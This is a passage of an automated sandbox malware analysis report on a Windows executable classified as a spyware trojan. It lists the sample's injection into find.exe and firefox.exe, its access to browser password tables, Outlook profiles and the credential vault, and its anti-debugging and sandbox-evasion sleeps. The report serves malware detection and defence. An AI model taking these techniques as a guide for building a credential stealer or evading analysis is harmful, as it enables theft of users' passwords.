                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_01133D70 NtOpenThread,2_2_01133D70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F4340 NtSetContextThread,LdrInitializeThunk,4_2_030F4340
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F4650 NtSuspendThread,LdrInitializeThunk,4_2_030F4650
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2B60 NtClose,LdrInitializeThunk,4_2_030F2B60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_030F2BA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_030F2BE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_030F2BF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2AD0 NtReadFile,LdrInitializeThunk,4_2_030F2AD0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2AF0 NtWriteFile,LdrInitializeThunk,4_2_030F2AF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2F30 NtCreateSection,LdrInitializeThunk,4_2_030F2F30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2FB0 NtResumeThread,LdrInitializeThunk,4_2_030F2FB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2FE0 NtCreateFile,LdrInitializeThunk,4_2_030F2FE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_030F2E80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_030F2EE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_030F2D10
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_030F2D30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2DD0 NtDelayExecution,LdrInitializeThunk,4_2_030F2DD0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_030F2DF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2C60 NtCreateKey,LdrInitializeThunk,4_2_030F2C60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_030F2C70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_030F2CA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F35C0 NtCreateMutant,LdrInitializeThunk,4_2_030F35C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F39B0 NtGetContextThread,LdrInitializeThunk,4_2_030F39B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2B80 NtQueryInformationFile,4_2_030F2B80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2AB0 NtWaitForSingleObject,4_2_030F2AB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2F60 NtCreateProcessEx,4_2_030F2F60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2F90 NtProtectVirtualMemory,4_2_030F2F90
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2FA0 NtQuerySection,4_2_030F2FA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2E30 NtWriteVirtualMemory,4_2_030F2E30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2EA0 NtAdjustPrivilegesToken,4_2_030F2EA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2D00 NtSetInformationFile,4_2_030F2D00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2DB0 NtEnumerateKey,4_2_030F2DB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2C00 NtQueryInformationProcess,4_2_030F2C00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2CC0 NtQueryVirtualMemory,4_2_030F2CC0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F2CF0 NtOpenProcess,4_2_030F2CF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F3010 NtOpenDirectoryObject,4_2_030F3010
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F3090 NtSetValueKey,4_2_030F3090
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F3D10 NtOpenProcessToken,4_2_030F3D10
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_030F3D70 NtOpenThread,4_2_030F3D70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C9370 NtCreateFile,4_2_008C9370
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C94D0 NtReadFile,4_2_008C94D0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C95C0 NtDeleteFile,4_2_008C95C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C9660 NtClose,4_2_008C9660
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008C97B0 NtAllocateVirtualMemory,4_2_008C97B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_02FAF996 NtClose,4_2_02FAF996
                      Source: C:\Windows\SysWOW64\find.exe Code function: String function: 0313F290 appears 103 times
                      Source: C:\Windows\SysWOW64\find.exe Code function: String function: 030AB970 appears 262 times
                      Source: C:\Windows\SysWOW64\find.exe Code function: String function: 03107E54 appears 107 times
                      Source: C:\Windows\SysWOW64\find.exe Code function: String function: 030F5130 appears 58 times
                      Source: C:\Windows\SysWOW64\find.exe Code function: String function: 0312EA12 appears 86 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Code function: String function: 0117F290 appears 103 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Code function: String function: 01147E54 appears 107 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Code function: String function: 010EB970 appears 262 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Code function: String function: 01135130 appears 58 times
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Code function: String function: 0116EA12 appears 86 times
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1702582188.0000000007E60000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1697576288.00000000031FF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1698119849.00000000041B9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1701516930.0000000007C40000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000000.1672151636.0000000000EC6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamedAwj.exe4 vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000000.00000002.1696441041.000000000135E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000011ED000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFIND.EXEj% vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFIND.EXEj% vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe Binary or memory string: OriginalFilenamedAwj.exe4 vs QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: QsBdpe1gK5.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/11
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QsBdpe1gK5.exe.log
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Mutant created: NULL
                      Source: C:\Windows\SysWOW64\find.exe File created: C:\Users\user\AppData\Local\Temp\e151968
                      Source: QsBdpe1gK5.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C88000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4126326491.0000000002C67000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000003.2028392218.0000000002C88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: QsBdpe1gK5.exe Virustotal: Detection: 80%
                      Source: QsBdpe1gK5.exe ReversingLabs: Detection: 87%
                      Source: unknown Process created: C:\Users\user\Desktop\QsBdpe1gK5.exe "C:\Users\user\Desktop\QsBdpe1gK5.exe"
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe Process created: C:\Users\user\Desktop\QsBdpe1gK5.exe "C:\Users\user\Desktop\QsBdpe1gK5.exe"
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"
                      Source: C:\Windows\SysWOW64\find.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: QsBdpe1gK5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: QsBdpe1gK5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: QsBdpe1gK5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: dAwj.pdbSHA256 source: find.exe, 00000004.00000002.4128433138.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.0000000002F0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2142201848.000000000C92C000.00000004.80000000.00040000.00000000.sdmp, QsBdpe1gK5.exe
                      Source: Binary string: find.pdb source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000002.4126594257.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oPkpFmCiYVL.exe, 00000003.00000000.1767735711.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126367984.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1850711530.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1841756637.0000000002D06000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: QsBdpe1gK5.exe, QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1850711530.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1841756637.0000000002D06000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: find.pdbGCTL source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000002.4126594257.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dAwj.pdb source: find.exe, 00000004.00000002.4128433138.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.0000000002F0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2142201848.000000000C92C000.00000004.80000000.00040000.00000000.sdmp, QsBdpe1gK5.exe
                      Source: QsBdpe1gK5.exeStatic PE information: 0xC8C08E34 [Wed Sep 23 04:55:16 2076 UTC]
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_0305EFB0 push esp; iretd 0_2_0305EFB1
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_073036C0 pushfd ; ret 0_2_073036CE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07302402 pushfd ; ret 0_2_07302417
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_073014B8 pushfd ; ret 0_2_073014C6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07302E0F pushfd ; ret 0_2_07302E1E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_0730BB3A push ebx; ret 0_2_0730BB46
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07302860 pushfd ; ret 0_2_07302861
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E41721 push ds; ret 0_2_07E4172E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E43578 push ebx; ret 0_2_07E43586
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E42400 push esp; ret 0_2_07E42402
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4237B push edx; ret 0_2_07E42392
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E432B6 push ds; ret 0_2_07E432B7
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E43108 push ebx; ret 0_2_07E43116
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E43EBF push esp; ret 0_2_07E43ECE
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E41E5B push ds; ret 0_2_07E41E76
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E42DBC push edx; ret 0_2_07E42DC6
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E4397F push ds; ret 0_2_07E4398E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 0_2_07E43951 push ds; ret 0_2_07E4395E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00416043 push ecx; iretd 2_2_00416091
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00403260 push eax; ret 2_2_00403262
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00417A0F push edi; iretd 2_2_00417A1C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00417A13 push edi; iretd 2_2_00417A1C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00409BF3 pushfd ; retf 2_2_00409C6C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_004093F6 push esp; ret 2_2_004093FC
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00409C57 pushfd ; retf 2_2_00409C6C
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00413C75 push esp; iretd 2_2_00413D3E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00414C2E push cs; iretd 2_2_00414C2F
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00413C83 push esp; iretd 2_2_00413D3E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_004185A1 push eax; retf 2_2_004185A2
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_00417EF3 push edi; ret 2_2_00417EFF
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_010C225F pushad ; ret 2_2_010C27F9
                      Source: QsBdpe1gK5.exeStatic PE information: section name: .text entropy: 7.8179183719331435
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: QsBdpe1gK5.exe PID: 7252, type: MEMORYSTR
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                      Source: C:\Windows\SysWOW64\find.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: 51B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: 9670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: A670000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: A880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeMemory allocated: B880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeCode function: 2_2_0113096E rdtsc 2_2_0113096E
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 2212Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exeWindow / User API: threadDelayed 7762Jump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeAPI coverage: 0.7 %
                      Source: C:\Windows\SysWOW64\find.exeAPI coverage: 2.6 %
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exe TID: 7272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 7700Thread sleep count: 2212 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 7700Thread sleep time: -4424000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 7700Thread sleep count: 7762 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\find.exe TID: 7700Thread sleep time: -15524000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep time: -80000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep count: 36 > 30Jump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep time: -54000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep count: 45 > 30Jump to behavior
                      Source: C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe TID: 7820Thread sleep time: -45000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008BC7D0 FindFirstFileW,FindNextFileW,FindClose,4_2_008BC7D0
                      Source: oPkpFmCiYVL.exe, 00000008.00000002.4126861408.000000000113F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                      Source: find.exe, 00000004.00000002.4126326491.0000000002C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA a
                      Source: firefox.exe, 00000009.00000002.2143875145.0000016D0C92E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\QsBdpe1gK5.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\find.exeProcess queried: DebugPortJump to behavior
